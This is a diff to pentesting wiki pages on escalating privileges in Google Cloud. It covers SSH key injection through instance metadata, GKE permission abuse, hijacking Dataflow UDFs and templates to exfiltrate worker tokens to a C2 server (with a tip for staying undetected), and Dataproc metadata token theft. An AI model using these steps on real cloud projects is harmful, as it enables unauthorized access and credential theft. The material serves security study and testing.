+Therefore, an attacker who can modify custom metadata may gain SSH access to a privileged account and compromise the host. This technique requires metadata-based SSH authorization: a VM with OS Login enabled ignores SSH keys stored in metadata. <sup>[[1]](#references)[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 ### **Add SSH key to existing privileged user**
 
 1. **Examine Existing SSH Keys on the Instance:**
 
-   - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key.
+   - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. <sup>[[1]](#references)[[4]](#references)</sup>
 
      ```bash
      gcloud compute instances describe [INSTANCE] --zone [ZONE]
      ```
 
-   - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
+   - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. <sup>[[1]](#references)[[4]](#references)</sup>
 
 2. **Prepare a Text File for SSH Key Metadata:**
-   - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones.
+   - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones because replacing the metadata value without re-adding them erases the old keys. <sup>[[1]](#references)[[4]](#references)</sup>
 3. **Generate a New SSH Key for the Target User (`alice` in this example):**
 
-   - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username.
+   - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. <sup>[[1]](#references)</sup>
 
      ```bash
      ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
      ```
 
-   - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata.
+   - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. <sup>[[1]](#references)[[4]](#references)</sup>
 
 4. **Update the Instance's SSH Key Metadata:**
 
-   - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command.
+   - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. <sup>[[1]](#references)[[4]](#references)</sup>
 
      ```bash
      gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
@@ -46,7 +47,7 @@ Therefore, if an attacker can modify custom metadata, he could make the the daem
 
 5. **Access the Instance Using the New SSH Key:**
 
-   - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example).
+   - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). A key in instance metadata is scoped to that VM, and the resulting privileges depend on the target account's permissions. <sup>[[1]](#references)[[5]](#references)</sup>
 
      ```bash
      ssh -i ./key alice@localhost
@@ -55,7 +56,7 @@ Therefore, if an attacker can modify custom metadata, he could make the the daem
 
 ### **Create a new privileged user and add a SSH key**
 
-If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges:
+If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges when the Linux guest agent is managing metadata-based accounts. <sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # define the new account username
@@ -77,24 +78,27 @@ ssh -i ./key "$NEWUSER"@localhost
 
 ### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
 
-It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:
+It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys and is using metadata-based SSH authorization. Here's a summarized guide: <sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 1. **Apply SSH Keys at the Project Level:**
 
-   - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled.
+   - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. <sup>[[1]](#references)[[4]](#references)</sup>
 
      ```bash
      gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
      ```
 
 2. **SSH into Instances Using Project-Wide Keys:**
-   - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access.
-   - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access.
+   - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. <sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
+   - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. <sup>[[1]](#references)</sup>
 
 ## References
 
-- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [1] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [2] [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts)
+- [3] [Guest agent functionality | Compute Engine](https://docs.cloud.google.com/compute/docs/images/guest-agent-functions)
+- [4] [Add SSH keys to VMs | Compute Engine](https://docs.cloud.google.com/compute/docs/connect/add-ssh-keys)
+- [5] [Best practices for controlling SSH login access | Compute Engine](https://docs.cloud.google.com/compute/docs/connect/ssh-best-practices/login-access)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
@@ -1,12 +1,10 @@
 # GCP - Container Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## container
 
 ### `container.clusters.get`
 
-This permission allows to **gather credentials for the Kubernetes cluster** using something like:
+With `container.clusters.get` (and, for credential retrieval, `container.clusters.getCredentials`), you can **gather credentials for the Kubernetes cluster** using something like:<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details><summary>Get Kubernetes cluster credentials</summary>
 
@@ -16,12 +14,12 @@ gcloud container clusters get-credentials <cluster_name> --zone <zone>
 
 </details>
 
-Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment.
+Without extra Kubernetes permissions, the resulting identity might only be able to **list some resources**, but those credentials are still useful for finding misconfigurations in the environment. The Kubernetes API continues to enforce the identity's available authorization.<sup>[[1]](#references)[[5]](#references)</sup>
 
 > [!NOTE]
-> Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
+> Note that **Kubernetes clusters might be configured to be private** or restricted with authorized networks; that can disallow access to the Kubernetes API server from the Internet.<sup>[[4]](#references)</sup>
 
-If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this:
+If you don't have this permission, you may still access the cluster if you obtained its endpoint, CA, and a valid Kubernetes credential through another authorized path. You then need to **create your own kubectl config file** with the cluster info. A kubeconfig separates cluster, user, and context records; a generated one looks like this:<sup>[[3]](#references)</sup>
 
 <details><summary>Example kubectl config file for GKE cluster</summary>
 
@@ -58,45 +56,59 @@ users:
 
 ### `container.roles.escalate` | `container.clusterRoles.escalate`
 
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** than the ones the principal has. However, a **GCP** principal with the corresponding `container.roles.escalate` or `container.clusterRoles.escalate` permission can **create/update Roles/ClusterRoles with more permissions** than the ones it holds, effectively bypassing this Kubernetes protection.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
-**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions.
+**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`**, respectively, are **also** **necessary** to perform those privilege escalation actions.<sup>[[1]](#references)</sup>
 
 ### `container.roles.bind` | `container.clusterRoles.bind`
 
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** than the ones the principal has. However, a **GCP** principal with the corresponding `container.roles.bind` or `container.clusterRoles.bind` permission can **create/update RoleBindings/ClusterRoleBindings with more permissions** than the ones it has, effectively bypassing this Kubernetes protection.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
-**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions.
+**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`**, respectively, are also **necessary** to perform those privilege escalation actions.<sup>[[1]](#references)</sup>
 
 ### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update`
 
-All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
-For more information check:
+These permissions allow you to **create or update a resource** with a controllable **Pod template**. In that template you can **specify the ServiceAccount** that is **attached** and the **image** that is **run**. If admission policy allows selecting a privileged ServiceAccount and its token is mounted, a malicious image can **exfiltrate that ServiceAccount's token to your server** and let you act as that identity; this does not automatically grant access to every ServiceAccount.<sup>[[1]](#references)[[6]](#references)[[9]](#references)</sup>\
+For more information check [Kubernetes Service Accounts](https://kubernetes.io/docs/concepts/security/service-accounts/).<sup>[[9]](#references)</sup>
 
-As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
+As we are in a GCP environment, a Pod may also be able to **get the node pool GCP service account** from the **metadata** service and **escalate privileges in GCP**. On GKE, the Compute Engine default service account is used for nodes by default, but custom node accounts and Workload Identity Federation for GKE change this behavior; verify metadata reachability and the actual node identity before relying on this path.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ### `container.secrets.get` | `container.secrets.list`
 
-As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
+As [**explained in this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listing-secrets), with these permissions you can **read** Kubernetes **Secrets** in their scope. A `kubernetes.io/service-account-token` Secret contains a legacy long-lived token for its referenced ServiceAccount; if such a Secret exists and that account is privileged, reading it can let you act as that account. Modern Kubernetes versions normally use short-lived projected TokenRequest tokens and no longer auto-create one token Secret for every ServiceAccount, so this permission does not automatically expose all ServiceAccount tokens.<sup>[[1]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ### `container.pods.exec`
 
-With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
+With this permission you will be able to **exec into pods** and run commands in their containers. This gives you **access** to credentials of the **Kubernetes ServiceAccounts assigned to pods** you can reach, when those credentials are mounted or otherwise available, which may escalate privileges within K8s. On GKE Standard clusters without Workload Identity Federation, a Pod that can reach the underlying metadata service may also **steal** the **GCP Service Account** of the **node pool**, **escalating privileges in GCP**; Autopilot, Workload Identity, and metadata settings can change this exposure.<sup>[[1]](#references)[[7]](#references)[[8]](#references)[[9]](#references)[[11]](#references)</sup>
 
 ### `container.pods.portForward`
 
-As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
+As **explained in this page**, these permissions let you **access local services** running in **Pods** by forwarding a local port. Those services might allow you to **escalate privileges in Kubernetes** (and in **GCP** if you can reach a metadata endpoint or another cloud-credential service).<sup>[[1]](#references)[[8]](#references)[[12]](#references)</sup>
 
 ### `container.serviceAccounts.createToken`
 
-Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
+Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s ServiceAccounts**, so you may be able to **privesc to an SA** inside Kubernetes. Kubernetes documents TokenRequest on the `serviceaccounts/token` subresource, but I could not find an official GKE mapping that confirms how this IAM permission authorizes that subresource or whether it can mint tokens for arbitrary ServiceAccounts; test it in a controlled cluster before relying on it.<sup>[[5]](#references)[[6]](#references)[[13]](#references)</sup>
 
 ### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update`
 
-These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
-For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#malicious-admission-controller).
+These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**. Mutating admission webhooks can inspect admitted objects and change them, so a malicious configuration may provide persistence or privilege escalation depending on its matching rules and backend.<sup>[[6]](#references)[[13]](#references)</sup>\
+For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#malicious-admission-controller).<sup>[[13]](#references)</sup>
+
+## References
+
+- [1] [GKE API permissions](https://cloud.google.com/kubernetes-engine/docs/reference/api-permissions)
+- [2] [gcloud container clusters get-credentials](https://cloud.google.com/sdk/gcloud/reference/container/clusters/get-credentials)
+- [3] [Configure Access to Multiple Clusters](https://kubernetes.io/docs/tasks/access-application-cluster/configure-access-multiple-clusters/)
+- [4] [Best practices for GKE networking](https://cloud.google.com/kubernetes-engine/docs/best-practices/networking)
+- [5] [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [6] [Google Kubernetes Engine roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/container)
+- [7] [About service accounts in GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/service-accounts)
+- [8] [GKE security overview](https://cloud.google.com/kubernetes-engine/docs/concepts/security-overview)
+- [9] [Service Accounts](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [10] [Secrets](https://kubernetes.io/docs/concepts/configuration/secret/)
+- [11] [kubectl exec](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/)
+- [12] [kubectl port-forward](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_port-forward/)
+- [13] [Role Based Access Control Good Practices](https://kubernetes.io/docs/concepts/security/rbac-good-practices/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Dataflow Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Dataflow
 
 {{#ref}}
@@ -12,20 +10,20 @@
 
 Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. 
 With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing.
-Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).
+Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).<sup>[[1]](#references)</sup>
 
 **Attack vectors:**
-- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
-- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
+- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets<sup>[[1]](#references)[[4]](#references)</sup>
+- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets<sup>[[1]](#references)</sup>
 
 
 > [!WARNING]
-> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.
+> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.<sup>[[1]](#references)[[4]](#references)</sup>
 
 
 #### Direct exploitation via gcloud CLI
 
-1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
+1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:<sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 
@@ -44,7 +42,7 @@ gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
 
 </details>
 
-2. Download the original UDF or job template from GCS:
+2. Download the original UDF or job template from GCS:<sup>[[1]](#references)</sup>
 
 <details>
 
@@ -60,9 +58,9 @@ gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
 
 </details>
 
-3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
+3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.<sup>[[1]](#references)</sup>
 
-4. Re-upload to overwrite the original file:
+4. Re-upload to overwrite the original file:<sup>[[1]](#references)</sup>
 
 <details>
 
@@ -77,12 +75,11 @@ gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
 
 </details>
 
-5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
+5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.<sup>[[1]](#references)</sup>
 
 #### Python UDF injection
 
-If you want to have a the worker exfiltrate data to your C2 server use `urllib.request` and not `requests`.
-`requests` is not preinstalled on classic Dataflow workers.
+If you want to have the worker exfiltrate data to your C2 server, use the standard-library `urllib.request` shown below. The original Dataflow Rider research notes that `requests` is not preinstalled on classic Dataflow workers; when a YAML UDF needs a third-party package, declare it in the transform's `dependencies` list.<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 <details>
 
@@ -118,9 +115,9 @@ def transform(line):
 
 #### Job template YAML injection
 
-Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.
+Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.<sup>[[4]](#references)[[5]](#references)</sup>
 
-Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination. 
+Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination.<sup>[[4]](#references)[[5]](#references)</sup>
 
 <details>
 
@@ -166,19 +163,22 @@ Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes val
 
 ### Compute Engine access to Dataflow Workers
 
-**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
+**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection<sup>[[2]](#references)[[6]](#references)[[7]](#references)</sup>
 
-Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
+Dataflow workers run as Compute Engine VMs and use a worker service account for requests. Access to workers via OS Login or SSH lets you read that account's short-lived token from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.<sup>[[2]](#references)[[7]](#references)[[8]](#references)</sup>
 
 For exploitation details, see:
 - [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
 
 ## References
 
-- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
-- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
-- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
-- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
-- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
+- [1] [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
+- [2] [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [3] [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
+- [4] [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
+- [5] [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
+- [6] [Compute Engine IAM roles and permissions](https://docs.cloud.google.com/compute/docs/access/iam?hl=en)
+- [7] [Set up OS Login](https://docs.cloud.google.com/compute/docs/oslogin/set-up-oslogin)
+- [8] [Authenticate workloads to Google Cloud APIs using service accounts](https://docs.cloud.google.com/compute/docs/access/authenticate-workloads)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
@@ -1,7 +1,5 @@
 # GCP Dataproc Privilege Escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Dataproc
 
 {{#ref}}
@@ -10,19 +8,23 @@
 
 ### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get` 
 
-I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below. 
+The Dataproc permissions listed here cover the cluster and job operations used by this method: submitting a job requires `dataproc.jobs.create` and `dataproc.clusters.use`, while the Google Cloud CLI also requires `dataproc.clusters.get` and `dataproc.jobs.get` for job submission and output handling. Uploading the script to Cloud Storage requires `storage.objects.create`; `storage.objects.get` and `storage.objects.list` can also be needed by CLI workflows.<sup>[[1]](#references)[[3]](#references)</sup>
+
+I was unable to get a reverse shell using this method. A job running on a Dataproc cluster VM can, however, query the metadata server and obtain an access token for the VM service account, as shown below.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 #### Steps to exploit
 
-- Place the job script on the GCP Bucket
+- Place the job script on the GCP Bucket.<sup>[[3]](#references)[[7]](#references)</sup>
 
-- Submit a job to a Dataproc cluster.
+- Submit a job to a Dataproc cluster.<sup>[[2]](#references)</sup>
 
-- Use the job to access the metadata server.
+- Use the job to access the metadata server.<sup>[[4]](#references)[[6]](#references)</sup>
 
-- Leak the service account token used by the cluster.
+- Leak the service account token used by the cluster.<sup>[[4]](#references)[[5]](#references)</sup>
 
 <details><summary>Python script to fetch SA token from metadata server</summary>
+
+The metadata endpoint used below is Google's documented instance service-account token endpoint; requests must include `Metadata-Flavor: Google`, and the JSON response contains `access_token`.<sup>[[5]](#references)</sup>
 
 ```python
 import requests
@@ -49,6 +51,8 @@ if __name__ == "__main__":
 
 <details><summary>Submit malicious job to Dataproc cluster</summary>
 
+`gsutil cp` uploads the script to a `gs://` Cloud Storage object, and `gcloud dataproc jobs submit pyspark` accepts a Cloud Storage script with the target cluster and region.<sup>[[2]](#references)[[7]](#references)</sup>
+
 ```bash
 # Copy the script to the storage bucket
 gsutil cp <python-script> gs://<bucket-name>/<python-script>
@@ -60,5 +64,15 @@ gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
 ```
 
 </details>
+
+## References
+
+- [1] [Managed Service for Apache Spark on clusters permissions and roles](https://docs.cloud.google.com/managed-spark/docs/concepts/iam/iam)
+- [2] [Submit a job](https://docs.cloud.google.com/managed-spark/docs/guides/submit-job)
+- [3] [Upload objects from a file system](https://docs.cloud.google.com/storage/docs/uploading-objects)
+- [4] [Managed Service for Apache Spark service accounts](https://docs.cloud.google.com/managed-spark/docs/concepts/configuring-clusters/service-accounts)
+- [5] [Authenticate workloads to Google Cloud APIs using service accounts](https://docs.cloud.google.com/compute/docs/access/authenticate-workloads)
+- [6] [Best practices for using service accounts securely](https://docs.cloud.google.com/iam/docs/best-practices-service-accounts)
+- [7] [gsutil tool](https://docs.cloud.google.com/storage/docs/gsutil)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
@@ -1,32 +1,40 @@
 # GCP - Deploymentmaneger Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## deploymentmanager
+
+Cloud Deployment Manager reached end of support on March 31, 2026. Treat the following as a legacy technique for existing projects and use a supported deployment technology for new work.<sup>[[6]](#references)</sup>
 
 ### `deploymentmanager.deployments.create`
 
-This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
+This single permission lets you **launch new deployments** of resources into GCP. Deployment Manager authenticates to other Google Cloud APIs as the project's Google APIs Service Agent, which is automatically granted the project-level Editor role; a deployment can, for example, create a Compute Engine instance configured with a chosen service account, making this a privilege-escalation path in a misconfigured project.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
-You could actually **launch any resource** listed in `gcloud deployment-manager types list`
+You can target any supported resource type listed by `gcloud deployment-manager types list`, subject to the underlying API and project constraints.<sup>[[6]](#references)</sup>
 
-In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
+In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/), the following [**script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a Compute Engine instance.<sup>[[1]](#references)[[2]](#references)</sup> That script won't work, so check the [**script to automate the creation, exploitation, and cleanup of a vulnerable environment**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh).<sup>[[3]](#references)</sup>
 
 ### `deploymentmanager.deployments.update`
 
-This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
+This is like the previous abuse, but instead of creating a new deployment, you modify an existing one and its managed resources (so be careful).<sup>[[4]](#references)[[7]](#references)</sup>
 
-Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
+Check the [**script to automate the creation, exploitation, and cleanup of a vulnerable environment**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh).<sup>[[4]](#references)</sup>
 
 ### `deploymentmanager.deployments.setIamPolicy`
 
-This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section.
